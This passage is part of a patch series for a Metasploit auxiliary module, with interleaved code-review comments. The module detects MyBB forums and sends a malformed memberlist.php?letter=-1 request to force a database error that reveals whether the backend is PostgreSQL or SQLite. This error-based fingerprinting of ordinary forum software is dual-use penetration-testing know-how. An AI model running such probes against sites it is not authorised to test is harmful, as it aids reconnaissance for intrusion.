#{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? - end + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? 
+ end - #Check Web-Server - _version_server = res['Server'] - if _version_server - _version_server = " Server Version: #{_version_server}".ljust(40) - else - _version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! 
This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end end def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) + response = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") + print_error("Failed to retrieve webpage.") + return end #Resolve response From 06912ac2b6180258b0ef8ead30eedfd15795bc27 Mon Sep 17 00:00:00 2001 
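Review bot: In `run`, the header values (`Accept`, `User-Agent`, `Cookie` and the rest) were placed under `'vars_get'` when the call became `send_request_cgi`, so they are sent as query-string parameters rather than HTTP headers, while the real parameter stays embedded in the path as `'/memberlist.php?letter=-1'`. Header values belong under `'headers'`, and the query belongs in `'vars_get' => { 'letter' => '-1' }` with `'uri' => normalize_uri(target_uri.path, 'memberlist.php')`. In `check`, `if req.nil?` already returns, which leaves the `else` branch of the following `if req` unreachable, and the hunk reverts `_version_server` to `_Version_server`. The same `'vars_get'` block is copied into `check` by PATCH 11/16.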
From: Karmanovskii Date: Sat, 17 May 2014 16:30:29 +0400 Subject: [PATCH 11/16] Update mybb_get_type_db.rb 1.Changed "Rex::Proto::Http::Client" to "Msf::Exploit::Remote::HttpClient" 2.changed the name of the variable "_Version_server". --- modules/auxiliary/gather/mybb_get_type_db.rb | 54 ++++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index a61c1166d1..e007166e77 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -36,24 +36,24 @@ class Metasploit3 < Msf::Auxiliary def check begin uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_cgi({ - 'uri' => uri, - 'method' => 'GET',}) - if req.nil? + res = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) + if res.nil? print_error("Failed to retrieve webpage.") return Exploit::CheckCode::Unknown end - if req - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end + if res.code != 200 print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") return Exploit::CheckCode::Unknown 
@@ -69,19 +69,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + web_server = res['Server'] + if web_server + web_server = " Server Version: #{web_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + web_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err @@ -99,12 +99,12 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" } }) if response.nil? From e26dee5e22ba0e7327580da2801f2cc3f913d7ad Mon Sep 17 00:00:00 2001 
From: Karmanovskii Date: Mon, 19 May 2014 21:32:30 +0400 Subject: [PATCH 12/16] Update mybb_get_type_db.rb 19/05/2014 I deleted - #return Exploit::CheckCode::Unknown # necessary ???? --- modules/auxiliary/gather/mybb_get_type_db.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e007166e77..b96e7a1a64 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -65,7 +65,6 @@ class Metasploit3 < Msf::Auxiliary php_version = " PHP Version: #{php_version}".ljust(40) else php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? end #Check Web-Server From eacf70af83e20098efd45178caf901875884b663 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 26 May 2014 23:26:28 +0400 Subject: [PATCH 13/16] Update mybb_get_type_db.rb 26.05.2014 23:26 I deleted mimicking IE11 --- modules/auxiliary/gather/mybb_get_type_db.rb | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index b96e7a1a64..dd8a585a7a 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + uri = normalize_uri(target_uri.path, 'index.php') res = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'intcheck' => 1 } }) if res.nil? 
@@ -92,18 +87,13 @@ class Metasploit3 < Msf::Auxiliary def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'letter' => -1 } }) if response.nil? From 1d8c46155bc1b239cedd38953bdc99effbe92500 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:14:55 -0500 Subject: [PATCH 14/16] Do last code cleaning --- modules/auxiliary/gather/mybb_get_type_db.rb | 56 +++++++++----------- 1 file changed, 26 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index dd8a585a7a..f127e03616 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb 
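Review bot: Nothing in `run` says why `letter` is sent as `-1`, and once this hunk moves it into `'vars_get'` it reads like an ordinary parameter. A one-line comment above the map would help the next maintainer, for example `# letter=-1 is intentionally not a valid letter filter; run inspects the resulting error text below`. That reading is inferred from the commit descriptions and the error strings matched later in `run`, so confirm it against memberlist.php before settling the wording. `run` continues past the end of this hunk.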
@@ -10,21 +10,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + This module checks if MyBB is running behind an URL. Also uses a malformed query to + force an error and fingerprint the backend database used by MyBB. }, - 'Author' => + 'Author' => [ #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii '#Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], + 'License' => MSF_LICENSE, 'DisclosureDate' => 'Feb 13 2014')) register_options( 
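Review bot: The rewritten `'Description'` drops the line `This affects versions <= 1.6.12`, and the `'References'` array is removed in the same hunk. The module info therefore no longer says which MyBB releases the behaviour applies to or where it is documented. Anyone triaging a result needs that to judge whether a finding is relevant, so I would keep the version line in the description and at least one reference entry. The `'Name'` value `'Determinant Databases MyBB '` also still ends in a trailing space. `initialize` continues past the end of this hunk.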
@@ -44,49 +40,49 @@ class Metasploit3 < Msf::Auxiliary 'intcheck' => 1 } }) - if res.nil? - print_error("Failed to retrieve webpage.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + if res.nil? || res.code != 200 return Exploit::CheckCode::Unknown end #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = " PHP Version: #{php_version}".ljust(40) + php_version = "PHP #{php_version}" else - php_version = " PHP Version: unknown".ljust(40) + php_version = "PHP version unknown" end #Check Web-Server web_server = res['Server'] if web_server - web_server = " Server Version: #{web_server}".ljust(40) + web_server = "#{web_server}" else - web_server = " Server Version: unknown".ljust(40) + web_server = "unknown web server" end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) + print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") return Exploit::CheckCode::Unknown end + rescue + return Exploit::CheckCode::Unknown + end end def run + print_status("#{peer} - Checking MyBB...") + unless check == Exploit::CheckCode::Detected + print_error("#{peer} - MyBB not found") + return + end + + print_status("#{peer} - Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 
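Review bot: The bare `rescue` at the end of `check` now returns `Exploit::CheckCode::Unknown` for any StandardError without logging it, where the old code printed the error class and message. Because `run` treats every result other than `Detected` as `MyBB not found`, a missing or non-200 response and an exception raised inside `check` all end in the same misleading message. I would keep the exception visible in verbose mode, `rescue => e` followed by `vprint_error("#{peer} - #{e.class}: #{e}")`, and word the `run` message as `MyBB not detected`. Separately, `web_server = "#{web_server}"` is a no-op interpolation and can be dropped. `run` continues past the end of this hunk.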
@@ -97,17 +93,17 @@ class Metasploit3 < Msf::Auxiliary } }) if response.nil? - print_error("Failed to retrieve webpage.") + print_error("#{peer} - Timeout...") return end #Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") + print_good("#{peer} - Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") + print_good("#{peer} - Running SQLite Database") else - print_status("Database MySQL or this is not forum MyBB or unknown Database") + print_status("#{peer} - Running MySQL or unknown database") end end end From b96c2dd0ca38da3feb1bd3af3cf46b8414fe0876 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:15:39 -0500 Subject: [PATCH 15/16] Change module filename --- .../gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} (100%) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb similarity index 100% rename from modules/auxiliary/gather/mybb_get_type_db.rb rename to modules/auxiliary/gather/mybb_db_fingerprint.rb From 86221de10eaa9f012266658199861a924a168265 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:18:27 -0500 Subject: [PATCH 16/16] Fix message --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index f127e03616..6dbdfeb160 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb 
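Review bot: The final `else` branch reports `Running MySQL or unknown database` for every response that contains neither error string, which includes a forum that returns no SQL error text at all. That is absence of evidence rather than an identification, and the message should say so, e.g. `print_status("#{peer} - No database error disclosed; backend not identified (possibly MySQL)")`. The `response.nil?` branch prints `Timeout...` although a nil response may have other causes; `No response` would be more accurate. A comment above the two `match` calls saying they look for database error text echoed in the page would also make it clear that a forum which hides SQL errors from its responses gives no signal here.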
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
 #Check PhP
 php_version = res['X-Powered-By']
 if php_version
- php_version = "PHP #{php_version}"
+ php_version = "#{php_version}"
 else
 php_version = "PHP version unknown"
 end
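Review bot: `php_version = "#{php_version}"` interpolates a string into itself and does nothing, so the `if` branch is now dead weight. The whole conditional can be written as `php_version = res['X-Powered-By'] || "PHP version unknown"`, which keeps the fallback text unchanged. The enclosing `check` method starts and ends outside this hunk.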